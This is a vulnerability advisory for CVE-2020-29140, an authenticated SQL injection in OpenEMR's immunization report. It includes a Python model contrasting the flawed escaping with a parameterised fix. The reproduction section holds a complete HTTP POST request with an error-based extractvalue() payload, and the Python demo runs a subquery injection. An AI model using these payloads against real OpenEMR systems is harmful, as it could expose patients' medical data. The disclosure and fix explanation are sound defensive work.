CVE-2020-29140. SQL injection vulnerability in OpenEMR 6.0.0-dev, 5.0.2(5)

Product: OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)

Vulnerability: SQL injection

Discovered by: Kutlymurat Mambetniyazov (@manfromkz)

Acknowledgements: NitroTeam.kz

Date: 11/24/2020

Description: In interface/reports/immunization_report.php the values of the form_code[] POST parameter are joined and spliced into an unquoted SQL IN (...) list. add_escape_custom() (a wrapper around mysqli_real_escape_string()) only backslash-escapes quote, backslash and line-terminator characters, so in this unquoted context it is ineffective: a value that contains no quotes, such as a function call or a subquery, is passed through unchanged and executed as SQL.

Requirements: an authenticated administrator account (the report page and a valid csrf_token_form for that session)

Tested on: Windows 10, Apache 2.4, MariaDB 10.3.22; PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev

Vulnerable code: interface/reports/immunization_report.php:129

$query_codes .= add_escape_custom($codes) . ") and ";
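To show why the escape call does not help, here is an added example (not OpenEMR's code and not from the advisory author): a small Python model of the IN-list construction, executed against SQLite instead of MariaDB. The stand-in add_escape_custom(), the c.id column name, the table names and the rows are all assumptions made for the demonstration. SQLite has no extractvalue(), so a scalar subquery is used to prove execution, while the advisory's own payload is checked only for surviving the escape unchanged. The hardened variant beside it validates each code as an integer and binds it as a parameter.

```python
"""Added example (not OpenEMR code): a model of the IN-list construction in
immunization_report.php, run against an in-memory SQLite database.
Table names, column names and rows are constructed for the demo."""
import re
import sqlite3
from typing import Iterable, List, Tuple

# The exact form_code[] value used in the advisory's request (MySQL-only; it
# is used here only to prove that escaping leaves it untouched).
ADVISORY_PAYLOAD = "extractvalue(0x0a,concat(0x0a,(version())))"


def add_escape_custom(value: str) -> str:
    """Stand-in for OpenEMR's add_escape_custom(), which delegates to
    mysqli_real_escape_string(): backslash-escapes quotes, backslashes, NUL
    and line terminators. Parentheses, commas, hex literals and function
    names are left alone, so an expression without quotes survives intact.
    (Assumption: the real function is charset-aware; this stand-in is not.)"""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def build_codes_filter_vulnerable(form_code: Iterable[str]) -> str:
    """Mirrors the vulnerable pattern: form_code[] values are joined, the
    joined string is escaped, and the result is spliced into an unquoted
    IN (...) list. The column name c.id is assumed for the demo."""
    codes = ", ".join(form_code)
    return "c.id in (" + add_escape_custom(codes) + ") and "


def build_codes_filter_safe(form_code: Iterable[str]) -> Tuple[str, List[int]]:
    """Hardened version: each code must be a plain decimal integer and is
    bound as a parameter, so the SQL text never contains attacker bytes."""
    ids: List[int] = []
    for raw in form_code:
        raw = raw.strip()
        if not re.fullmatch(r"[0-9]+", raw):
            raise ValueError(f"rejecting non-numeric form_code value: {raw!r}")
        ids.append(int(raw))
    placeholders = ", ".join("?" for _ in ids)
    return f"c.id in ({placeholders}) and ", ids


def _demo_db() -> sqlite3.Connection:
    """Constructed schema: a codes table the report is meant to read and a
    second table the report should never be able to reach."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table codes (id integer primary key, label text);
        insert into codes values (25, 'code-25'), (30, 'code-30'), (40, 'code-40');
        create table secret (id integer primary key, note text);
        insert into secret values (40, 'only reachable via injection');
    """)
    return con


def run_vulnerable(form_code: Iterable[str]) -> List[int]:
    """Executes the report query built the vulnerable way and returns the
    matching ids. A subquery smuggled in through form_code[] is executed."""
    con = _demo_db()
    sql = "select c.id from codes c where " + build_codes_filter_vulnerable(form_code) + "1 = 1"
    return [row[0] for row in con.execute(sql)]


def run_safe(form_code: Iterable[str]) -> List[int]:
    """Same query built the safe way; non-numeric input is rejected before
    any SQL is sent to the database."""
    con = _demo_db()
    fragment, params = build_codes_filter_safe(form_code)
    sql = "select c.id from codes c where " + fragment + "1 = 1"
    return [row[0] for row in con.execute(sql, params)]


if __name__ == "__main__":
    # Escaping does nothing to the advisory's payload: there is nothing to escape.
    assert add_escape_custom(ADVISORY_PAYLOAD) == ADVISORY_PAYLOAD
    # SQLite has no extractvalue(), so a subquery shows that injected SQL runs.
    print(run_vulnerable(["25", "(select id from secret)"]))  # [25, 40]
    print(run_safe(["25", "30"]))                              # [25, 30]
    try:
        run_safe(["25", "(select id from secret)"])
    except ValueError as exc:
        print("hardened version refused:", exc)
```

The point of the hardened variant is that the fix is not a stronger escape function: a value that ends up outside quotes has to be validated against the type the column expects and bound as a parameter, otherwise any quote-free expression is still SQL.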

Steps to reproduce:

Send the following POST request (replace the Host, the csrf_token_form value and the OpenEMR cookie with those of your own administrator session). The second form_code[] value contains no quote characters, so add_escape_custom() leaves it unchanged; extractvalue() is given an invalid XPath expression, and MariaDB's "XPATH syntax error" message echoes the concatenated string, here the output of version():

POST /interface/reports/immunization_report.php HTTP/1.1
Host: openemr60.kz
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Origin: https://openemr60.kz
Connection: close
Referer: https://openemr60.kz/interface/reports/immunization_report.php
Cookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD; 

csrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&form_refresh=true&form_get_hl7=false&form_code%5B%5D=25&form_code%5B%5D=extractvalue(0x0a,concat(0x0a,(version())))&form_from_date=2020-11-10&form_to_date=2020-11-17

Screenshot for 6.0.0-dev:

Screenshot for 5.0.2(5):

Timeline of the vulnerability:

11/24/2020 – vulnerability discovered
11/24/2020 – vendor notified
11/25/2020 – confirmed by vendor
11/27/2020 – CVE ID reserved at MITRE
01/07/2021 – patch released
02/15/2021 – advisory published
